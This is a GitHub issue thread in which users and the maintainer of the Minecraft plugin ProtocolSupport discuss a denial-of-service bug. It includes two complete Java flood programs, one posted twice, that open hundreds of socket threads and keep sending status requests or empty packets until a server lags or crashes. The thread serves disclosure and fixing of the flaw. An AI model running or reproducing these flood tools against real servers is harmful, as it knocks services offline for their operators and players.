### ISSUE TITLE
Found a serious BUG, can cause the server being malicious stress tests.

### ISSUE THREAD

**Issue by qiuDar** [ProtocolSupport/ProtocolSupport#226]
Hello, I am a Chinese, not familiar with English, I hope you can understand.
I don't know how in the git Posting pictures above. If you can, we can chat on skype?Or in other ways.
I'm not a programmer, I can't use professional terms to explain to you, only through some testing pictures to show you.
I've tested the latest version of ProtocolSupport still exists the problem.Fortunately BungeeCord will not encounter this problem.

**Comment by qiuDar** [comment]
http://i1362.photobucket.com/albums/r700/qiuMC/F3AWU97R6Y5LHP_zpswhnwsa1i.png
http://i1362.photobucket.com/albums/r700/qiuMC/Z21K2H_70HBFDVV7DF_zpsoq8q9hzv.png

**Comment by qiuDar** [comment]
http://i1362.photobucket.com/albums/r700/qiuMC/F3AWU97R6Y5LHP_zpswhnwsa1i.png
http://i1362.photobucket.com/albums/r700/qiuMC/Z21K2H_70HBFDVV7DF_zpsoq8q9hzv.png

**Comment by qiuDar** [comment]
http://i1362.photobucket.com/albums/r700/qiuMC/F3AWU97R6Y5LHP_zpswhnwsa1i.png
http://i1362.photobucket.com/albums/r700/qiuMC/Z21K2H_70HBFDVV7DF_zpsoq8q9hzv.png

**Comment by qiuDar** [comment]
http://i1362.photobucket.com/albums/r700/qiuMC/F3AWU97R6Y5LHP_zpswhnwsa1i.png
http://i1362.photobucket.com/albums/r700/qiuMC/Z21K2H_70HBFDVV7DF_zpsoq8q9hzv.png

**Comment by Shevchik** [comment]
You can join gitter and explain it here.

**Comment by qiuDar** [comment]
Don't know whether you know, in version 1.7, create holes in minecraft, sent by a large number of useless request packet, to let the server crash.

**Comment by Shevchik** [comment]
Read protocolsupport wiki, reduce login thread keep alive and maximum count and try again.

**Comment by qiuDar** [comment]
package cn.citycraft.PluginHelper.misc;

import java.io.IOException;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.util.Date;
import java.util.Scanner;

/**
 * Motd攻击代码
 *
 * @since 2016年7月22日 下午4:01:43
 * @author 喵♂呜
 */
public class MotdAttack {
    // 221.228.215.239:25571
    public static String Address = "127.0.0.1";
    public static int Port = 25565;
    public static int Thread_NUMBER = 512;
    public static int Packet_NUMBER = 1024;

    private static int alive = 0;

    public static void main(final String[] args) throws IOException, InterruptedException {
        final Scanner scanner = new Scanner(System.in);
        System.out.println("请输入服务器地址(默认127.0.1:25565)");
        final String add = scanner.nextLine();
        if (add.contains(":")) {
            final String[] arr = add.split(":");
            Address = arr[0];
            Port = Integer.parseInt(arr[1]);
        } else {
            Address = add;
        }
        System.out.println("请输入线程数");
        Thread_NUMBER = scanner.nextInt();
        for (int i = 0; i < Thread_NUMBER; i++) {
            new AttackThread(i).start();
        }
        scanner.close();
    }

    static class AttackThread extends Thread {
        int id = 0;

        public AttackThread(final int id) {
            alive++;
            this.id = id;
        }

        @Override
        public void run() {
            try {
                final Socket socket = new Socket();
                socket.connect(new InetSocketAddress(Address, Port));
                final byte[] head = new byte[] { 0x07, 0x00, 0x04, 0x01, 0x30, 0x63, (byte) 0xDD, 0x01 };
                if (socket.isConnected() && !socket.isClosed()) {
                    final OutputStream out = socket.getOutputStream();
                    out.write(head);
                    out.flush();
                    while (socket.isConnected() && !socket.isClosed()) {
                        for (int i = 0; i < 10; i++) {
                            out.write(new byte[] { 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00 });
                        }
                        out.flush();
                        Thread.sleep(1);
                    }
                    out.close();
                }
                socket.close();
            } catch (final Exception e) {
            }
            if (alive < Thread_NUMBER / 2) {
                System.out.println(new Date().toLocaleString() + "Thread dies more than half restart...");
                for (int i = 0; i < Thread_NUMBER / 2; i++) {
                    new AttackThread(i).start();
                }
            }
        }
    }
}

**Comment by qiuDar** [comment]
`package cn.citycraft.PluginHelper.misc;

import java.io.IOException;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.util.Date;
import java.util.Scanner;

/**
 * Motd攻击代码
 *
 * @since 2016年7月22日 下午4:01:43
 * @author 喵♂呜
 */
public class MotdAttack {
    // 221.228.215.239:25571
    public static String Address = "127.0.0.1";
    public static int Port = 25565;
    public static int Thread_NUMBER = 512;
    public static int Packet_NUMBER = 1024;

    private static int alive = 0;

    public static void main(final String[] args) throws IOException, InterruptedException {
        final Scanner scanner = new Scanner(System.in);
        System.out.println("请输入服务器地址(默认127.0.1:25565)");
        final String add = scanner.nextLine();
        if (add.contains(":")) {
            final String[] arr = add.split(":");
            Address = arr[0];
            Port = Integer.parseInt(arr[1]);
        } else {
            Address = add;
        }
        System.out.println("请输入线程数");
        Thread_NUMBER = scanner.nextInt();
        for (int i = 0; i < Thread_NUMBER; i++) {
            new AttackThread(i).start();
        }
        scanner.close();
    }

    static class AttackThread extends Thread {
        int id = 0;

        public AttackThread(final int id) {
            alive++;
            this.id = id;
        }

        @Override
        public void run() {
            try {
                final Socket socket = new Socket();
                socket.connect(new InetSocketAddress(Address, Port));
                final byte[] head = new byte[] { 0x07, 0x00, 0x04, 0x01, 0x30, 0x63, (byte) 0xDD, 0x01 };
                if (socket.isConnected() && !socket.isClosed()) {
                    final OutputStream out = socket.getOutputStream();
                    out.write(head);
                    out.flush();
                    while (socket.isConnected() && !socket.isClosed()) {
                        for (int i = 0; i < 10; i++) {
                            out.write(new byte[] { 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00 });
                        }
                        out.flush();
                        Thread.sleep(1);
                    }
                    out.close();
                }
                socket.close();
            } catch (final Exception e) {
            }
            if (alive < Thread_NUMBER / 2) {
                System.out.println(new Date().toLocaleString() + "Thread dies more than half restart...");
                for (int i = 0; i < Thread_NUMBER / 2; i++) {
                    new AttackThread(i).start();
                }
            }
        }
    }
}
`

**Comment by qiuDar** [comment]
This is one of my friends to write code, he said to you see you can understand.

**Comment by Shevchik** [comment]
So it has nothing to do with login handler.
This program just opens connection, write status request to it and then keeps writing empty packets so connection won't close. But spigot itself doesn't have protection from empty packets anyway, so i don't think that i should add such check too.

**Comment by qiuDar** [comment]
Starting from version 1.8, spigot has to repair the problem.But ProtocolSupport accepted 1.7 request packet, so there is the problem.

**Comment by Shevchik** [comment]
1.7 handshake packet is not different from 1.8 one.

Try using your program on a spigot server without protocolsupport (just don't forget to change he version id so server won't kick you), it will yield almost same results.

**Comment by NewbieOrange** [comment]
Using that program on a 1.8.8 spigot server will have no effect at all.

**Comment by qiuDar** [comment]
This is not installed protocolsupport server.
http://i1362.photobucket.com/albums/r700/qiuMC/QQ20160724193121_zpsizqhwq0p.png

This is the server installation protocolsupport.
http://i1362.photobucket.com/albums/r700/qiuMC/QQ20160724193600_zpsfiyp9mna.png

**Comment by qiuDar** [comment]
You use this to test a program, you will know what I said is true.

**Comment by a08381** [comment]
= = @qiuDar `MDZZ`
After the version 1.8.3, MineCraft fix this bug when someone send motd ping packet and then do nothing.
But if owner use ProtocolSupport, someone use this program to attack server, it will make server laggy and even crash.
Reducing login thread keep alive and maximum count can just make it crash slower, and normal players cannot get in the server when someone is attacking.

**Comment by Shevchik** [comment]
Okay, there are actually 2 issues here, will fix at least one of them.
You spam with a status request packets, but it is still possible to spam with empty packets.

I will fix status spam, but the code below will still cause high load on the server

[code]
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;

public class MotdAttack {

	public static String Address = "127.0.0.1";
	public static int Port = 25565;
	public static int Thread_NUMBER = 512;

	public static void main(final String[] args) throws IOException, InterruptedException {
		for (int i = 0; i < Thread_NUMBER; i++) {
			new AttackThread().start();
		}
	}

	static class AttackThread extends Thread {

		@Override
		public void run() {
			method();
		}

		private void method() {
			try {
				final Socket socket = new Socket();
				socket.connect(new InetSocketAddress(Address, Port));
				ByteArrayOutputStream packetData = new ByteArrayOutputStream();
				writeVarInt(packetData, 0); //packet id
				writeVarInt(packetData, 210); //1.10 protocol id
				writeVarInt(packetData, 0); //hostname length
				packetData.write(0x63); //port short part1
				packetData.write(0xDD); //port short part2
				writeVarInt(packetData, 0x1); //next state
				ByteArrayOutputStream packet = new ByteArrayOutputStream();
				writeVarInt(packet, packetData.size());
				packetData.writeTo(packet);
				if (socket.isConnected() && !socket.isClosed()) {
					final OutputStream out = socket.getOutputStream();
					out.write(packet.toByteArray());
					out.flush();
					while (true) {
						for (int i = 0; i < 10; i++) {
							out.write(new byte[] {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}); //zero packet length
						}
						out.flush();
					}
				}
			} catch (Throwable t) {
				method();
			}
		}

	}

	public static void writeVarInt(OutputStream to, int i) throws IOException {
		while ((i & 0xFFFFFF80) != 0x0) {
			to.write(i | 0x80);
			i >>>= 7;
		}
		to.write(i);
	}

}
[/code]

**Comment by qiuDar** [comment]
Thank you very much.I have one request, hope you can provide a compatible version 1.8.8 version of repair ProtocolSupport. My side 1.8.8 server is more, but for some reason, can't let players update 1.8 client.They use 1.7.2 clients now.
